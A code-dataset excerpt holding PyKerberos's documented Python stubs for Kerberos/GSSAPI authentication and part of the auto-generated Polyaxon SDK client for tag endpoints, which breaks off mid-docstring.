max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content
---|---|---|---|---
desktop/core/ext-py/kerberos-1.3.0/pysrc/kerberos.py | yetsun/hue | 5,079 | 66601 |
##
# Copyright (c) 2006-2018 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
PyKerberos Function Description.
"""
class KrbError(Exception):
pass
class BasicAuthError(KrbError):
pass
class GSSError(KrbError):
pass
def checkPassword(user, pswd, service, default_realm):
"""
This function provides a simple way to verify that a user name and password
match those normally used for Kerberos authentication.
It does this by checking that the supplied user name and password can be
used to get a ticket for the supplied service.
If the user name does not contain a realm, then the default realm supplied
is used.
For this to work, Kerberos must be properly configured on this machine.
That will likely mean ensuring that the edu.mit.Kerberos preference file
has the correct realms and KDCs listed.
IMPORTANT: This method is vulnerable to KDC spoofing attacks and should
only be used for testing. Do not use this in any production system - your
security could be compromised if you do.
@param user: A string containing the Kerberos user name.
A realm may be included by appending an C{"@"} followed by the realm
string to the actual user id.
If no realm is supplied, then the realm set in the default_realm
argument will be used.
@param pswd: A string containing the password for the user.
@param service: A string containing the Kerberos service to check access
for.
This will be of the form C{"sss/xx.yy.zz"}, where C{"sss"} is the
service identifier (e.g., C{"http"}, C{"krbtgt"}), and C{"xx.yy.zz"} is
the hostname of the server.
@param default_realm: A string containing the default realm to use if one
is not supplied in the user argument.
Note that Kerberos realms are normally all uppercase (e.g.,
C{"EXAMPLE.COM"}).
@return: True if authentication succeeds, false otherwise.
"""
def changePassword(user, oldpswd, newpswd):
"""
This function changes the user's password on the KDC.
@param user: A string containing the Kerberos user name.
A realm may be included by appending a C{"@"} followed by the realm
string to the actual user id.
If no realm is supplied, then the default realm is used.
@param oldpswd: A string containing the old (current) password for the
user.
@param newpswd: A string containing the new password for the user.
@return: True if password changing succeeds, false otherwise.
"""
def getServerPrincipalDetails(service, hostname):
"""
This function returns the service principal for the server given a service
type and hostname.
Details are looked up via the C{/etc/keytab} file.
@param service: A string containing the Kerberos service type for the
server.
@param hostname: A string containing the hostname of the server.
@return: A string containing the service principal.
"""
"""
GSSAPI Function Result Codes:
-1 : Error
0 : GSSAPI step continuation (only returned by 'Step' function)
1 : GSSAPI step complete, or function return OK
"""
# Some useful result codes
AUTH_GSS_CONTINUE = 0
AUTH_GSS_COMPLETE = 1
# Some useful gss flags
GSS_C_DELEG_FLAG = 1
GSS_C_MUTUAL_FLAG = 2
GSS_C_REPLAY_FLAG = 4
GSS_C_SEQUENCE_FLAG = 8
GSS_C_CONF_FLAG = 16
GSS_C_INTEG_FLAG = 32
GSS_C_ANON_FLAG = 64
GSS_C_PROT_READY_FLAG = 128
GSS_C_TRANS_FLAG = 256
def authGSSClientInit(service, **kwargs):
"""
Initializes a context for GSSAPI client-side authentication with the given
service principal.
L{authGSSClientClean} must be called after this function returns an OK
result to dispose of the context once all GSSAPI operations are complete.
@param service: A string containing the service principal in the form
C{"type@fqdn"}.
@param principal: Optional string containing the client principal in the
form C{"user@realm"}.
@param gssflags: Optional integer used to set GSS flags.
(e.g. C{GSS_C_DELEG_FLAG|GSS_C_MUTUAL_FLAG|GSS_C_SEQUENCE_FLAG} will
allow for forwarding credentials to the remote host)
@param delegated: Optional server context containing delegated credentials
@param mech_oid: Optional GSS mechanism OID
@return: A tuple of (result, context) where result is the result code (see
above) and context is an opaque value that will need to be passed to
subsequent functions.
"""
def authGSSClientClean(context):
"""
Destroys the context for GSSAPI client-side authentication. This function
is provided for compatibility with earlier versions of PyKerberos but does
nothing. The context object destroys itself when it is reclaimed.
@param context: The context object returned from L{authGSSClientInit}.
@return: A result code (see above).
"""
def authGSSClientInquireCred(context):
"""
Get the current user name, if any, without a client-side GSSAPI step.
If the principal has already been authenticated via completed client-side
GSSAPI steps then the user name of the authenticated principal is kept. The
user name will be available via authGSSClientUserName.
@param context: The context object returned from L{authGSSClientInit}.
@return: A result code (see above).
"""
"""
Address Types for Channel Bindings
https://docs.oracle.com/cd/E19455-01/806-3814/6jcugr7dp/index.html#reference-9
"""
GSS_C_AF_UNSPEC = 0
GSS_C_AF_LOCAL = 1
GSS_C_AF_INET = 2
GSS_C_AF_IMPLINK = 3
GSS_C_AF_PUP = 4
GSS_C_AF_CHAOS = 5
GSS_C_AF_NS = 6
GSS_C_AF_NBS = 7
GSS_C_AF_ECMA = 8
GSS_C_AF_DATAKIT = 9
GSS_C_AF_CCITT = 10
GSS_C_AF_SNA = 11
GSS_C_AF_DECnet = 12
GSS_C_AF_DLI = 13
GSS_C_AF_LAT = 14
GSS_C_AF_HYLINK = 15
GSS_C_AF_APPLETALK = 16
GSS_C_AF_BSC = 17
GSS_C_AF_DSS = 18
GSS_C_AF_OSI = 19
GSS_C_AF_X25 = 21
GSS_C_AF_NULLADDR = 255
def channelBindings(**kwargs):
"""
Builds a gss_channel_bindings_struct which can be passed to
L{authGSSClientStep} to bind channel bindings to the authentication.
Details on channel bindings can be found at
https://tools.ietf.org/html/rfc5929. More details on the
struct can be found at
https://docs.oracle.com/cd/E19455-01/806-3814/overview-52/index.html
@param initiator_addrtype: Optional integer used to set the
initiator_addrtype, defaults to GSS_C_AF_UNSPEC if not set
@param initiator_address: Optional byte string containing the
initiator_address
@param acceptor_addrtype: Optional integer used to set the
acceptor_addrtype, defaults to GSS_C_AF_UNSPEC if not set
@param acceptor_address: Optional byte string containing the
acceptor_address
@param application_data: Optional byte string containing the
application_data. An example would be 'tls-server-end-point:{cert-hash}'
where {cert-hash} is the hash of the server's certificate
@return: A tuple of (result, gss_channel_bindings_struct) where result is
the result code and gss_channel_bindings_struct is the channel bindings
structure that can be passed onto L{authGSSClientStep}
"""
def authGSSClientStep(context, challenge, **kwargs):
"""
Processes a single GSSAPI client-side step using the supplied server data.
@param context: The context object returned from L{authGSSClientInit}.
@param challenge: A string containing the base64-encoded server data (which
may be empty for the first step).
@param channel_bindings: Optional channel bindings to bind to the
authentication request. This struct can be built using
L{channelBindings}; if not specified, GSS_C_NO_CHANNEL_BINDINGS is
passed along as the default.
@return: A result code (see above).
"""
def authGSSClientResponse(context):
"""
Get the client response from the last successful GSSAPI client-side step.
@param context: The context object returned from L{authGSSClientInit}.
@return: A string containing the base64-encoded client data to be sent to
the server.
"""
def authGSSClientResponseConf(context):
"""
Determine whether confidentiality was enabled in the previously unwrapped
buffer.
@param context: The context object returned from L{authGSSClientInit}.
@return: C{1} if confidentiality was enabled in the previously unwrapped
buffer, C{0} otherwise.
"""
def authGSSClientUserName(context):
"""
Get the user name of the principal authenticated via the now complete
GSSAPI client-side operations, or the current user name obtained via
authGSSClientInquireCred. This method must only be called after
authGSSClientStep or authGSSClientInquireCred return a complete response
code.
@param context: The context object returned from L{authGSSClientInit}.
@return: A string containing the user name.
"""
def authGSSClientUnwrap(context, challenge):
"""
Perform the client side GSSAPI unwrap step.
@param challenge: A string containing the base64-encoded server data.
@return: A result code (see above)
"""
def authGSSClientWrap(context, data, user=None, protect=0):
"""
Perform the client side GSSAPI wrap step.
@param data: The result of the L{authGSSClientResponse} after the
L{authGSSClientUnwrap}.
@param user: The user to authorize.
@param protect: If C{0}, then just provide integrity protection.
If C{1}, then provide confidentiality as well.
@return: A result code (see above)
"""
def authGSSServerInit(service):
"""
Initializes a context for GSSAPI server-side authentication with the given
service principal.
authGSSServerClean must be called after this function returns an OK result
to dispose of the context once all GSSAPI operations are complete.
@param service: A string containing the service principal in the form
C{"type@fqdn"}. To initialize the context for the purpose of accepting
delegated credentials, pass the literal string C{"DELEGATE"}.
@return: A tuple of (result, context) where result is the result code (see
above) and context is an opaque value that will need to be passed to
subsequent functions.
"""
def authGSSServerClean(context):
"""
Destroys the context for GSSAPI server-side authentication. This function
is provided for compatibility with earlier versions of PyKerberos but does
nothing. The context object destroys itself when it is reclaimed.
@param context: The context object returned from L{authGSSServerInit}.
@return: A result code (see above).
"""
def authGSSServerStep(context, challenge):
"""
Processes a single GSSAPI server-side step using the supplied client data.
@param context: The context object returned from L{authGSSServerInit}.
@param challenge: A string containing the base64-encoded client data.
@return: A result code (see above).
"""
def authGSSServerResponse(context):
"""
Get the server response from the last successful GSSAPI server-side step.
@param context: The context object returned from L{authGSSServerInit}.
@return: A string containing the base64-encoded server data to be sent to
the client.
"""
def authGSSServerHasDelegated(context):
"""
Checks whether a server context has delegated credentials.
@param context: The context object returned from L{authGSSServerInit}.
@return: A bool saying whether delegated credentials are available.
"""
def authGSSServerUserName(context):
"""
Get the user name of the principal trying to authenticate to the server.
This method must only be called after L{authGSSServerStep} returns a
complete or continue response code.
@param context: The context object returned from L{authGSSServerInit}.
@return: A string containing the user name.
"""
def authGSSServerTargetName(context):
"""
Get the target name if the server did not supply its own credentials.
This method must only be called after L{authGSSServerStep} returns a
complete or continue response code.
@param context: The context object returned from L{authGSSServerInit}.
@return: A string containing the target name.
"""
def authGSSServerStoreDelegate(context):
"""
Save the ticket sent to the server in the file C{/tmp/krb5_pyserv_XXXXXX}.
This method must only be called after L{authGSSServerStep} returns a
complete or continue response code.
@param context: The context object returned from L{authGSSServerInit}.
@return: A result code (see above).
"""
def authGSSServerCacheName(context):
"""
Get the name of the credential cache created with
L{authGSSServerStoreDelegate}.
This method must only be called after L{authGSSServerStoreDelegate}.
@param context: The context object returned from L{authGSSServerInit}.
@return: A string containing the cache name.
"""
|
sdks/python/http_client/v1/polyaxon_sdk/api/tags_v1_api.py | polyaxon/polyaxon | 3,200 | 66631 |
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Polyaxon SDKs and REST API specification.
Polyaxon SDKs and REST API specification. # noqa: E501
The version of the OpenAPI document: 1.11.3
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from polyaxon_sdk.api_client import ApiClient
from polyaxon_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class TagsV1Api(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_tag(self, owner, body, **kwargs): # noqa: E501
"""Create tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tag(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1Tag body: Tag body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_tag_with_http_info(owner, body, **kwargs) # noqa: E501
def create_tag_with_http_info(self, owner, body, **kwargs): # noqa: E501
"""Create tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tag_with_http_info(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1Tag body: Tag body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Tag, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_tag" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `create_tag`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_tag`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Tag', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_tag(self, owner, name, **kwargs): # noqa: E501
"""Delete tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tag(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_tag_with_http_info(owner, name, **kwargs) # noqa: E501
def delete_tag_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Delete tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tag_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_tag" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `delete_tag`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_tag`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tag(self, owner, name, **kwargs): # noqa: E501
"""Get tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tag_with_http_info(owner, name, **kwargs) # noqa: E501
def get_tag_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Get tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namespace (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Tag, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tag" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_tag`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_tag`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Tag', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_tags(self, owner, **kwargs): # noqa: E501
"""List tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tags(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool bookmarks: Filter by bookmarks.
:param str pins: Pinned entities.
:param str mode: Mode of the search.
:param bool no_page: No pagination.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListTagsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_tags_with_http_info(owner, **kwargs) # noqa: E501
def list_tags_with_http_info(self, owner, **kwargs): # noqa: E501
"""List tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tags_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool bookmarks: Filter by bookmarks.
:param str pins: Pinned entities.
:param str mode: Mode of the search.
:param bool no_page: No pagination.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListTagsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query',
'bookmarks',
'pins',
'mode',
'no_page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_tags" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'bookmarks' in local_var_params and local_var_params['bookmarks'] is not None: # noqa: E501
query_params.append(('bookmarks', local_var_params['bookmarks'])) # noqa: E501
if 'pins' in local_var_params and local_var_params['pins'] is not None: # noqa: E501
query_params.append(('pins', local_var_params['pins'])) # noqa: E501
if 'mode' in local_var_params and local_var_params['mode'] is not None: # noqa: E501
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
if 'no_page' in local_var_params and local_var_params['no_page'] is not None: # noqa: E501
query_params.append(('no_page', local_var_params['no_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListTagsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def load_tags(self, owner, **kwargs): # noqa: E501
"""Load tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_tags(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool bookmarks: Filter by bookmarks.
:param str pins: Pinned entities.
:param str mode: Mode of the search.
:param bool no_page: No pagination.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1LoadTagsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.load_tags_with_http_info(owner, **kwargs) # noqa: E501
def load_tags_with_http_info(self, owner, **kwargs): # noqa: E501
"""Load tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_tags_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool bookmarks: Filter by bookmarks.
:param str pins: Pinned entities.
:param str mode: Mode of the search.
:param bool no_page: No pagination.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1LoadTagsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query',
'bookmarks',
'pins',
'mode',
'no_page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method load_tags" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `load_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'bookmarks' in local_var_params and local_var_params['bookmarks'] is not None: # noqa: E501
query_params.append(('bookmarks', local_var_params['bookmarks'])) # noqa: E501
if 'pins' in local_var_params and local_var_params['pins'] is not None: # noqa: E501
query_params.append(('pins', local_var_params['pins'])) # noqa: E501
if 'mode' in local_var_params and local_var_params['mode'] is not None: # noqa: E501
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
if 'no_page' in local_var_params and local_var_params['no_page'] is not None: # noqa: E501
query_params.append(('no_page', local_var_params['no_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/load', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1LoadTagsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_tag(self, owner, tag_name, body, **kwargs): # noqa: E501
"""Patch tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_tag(owner, tag_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str tag_name: Tag name (required)
:param V1Tag body: Tag body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_tag_with_http_info(owner, tag_name, body, **kwargs) # noqa: E501
def patch_tag_with_http_info(self, owner, tag_name, body, **kwargs): # noqa: E501
"""Patch tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
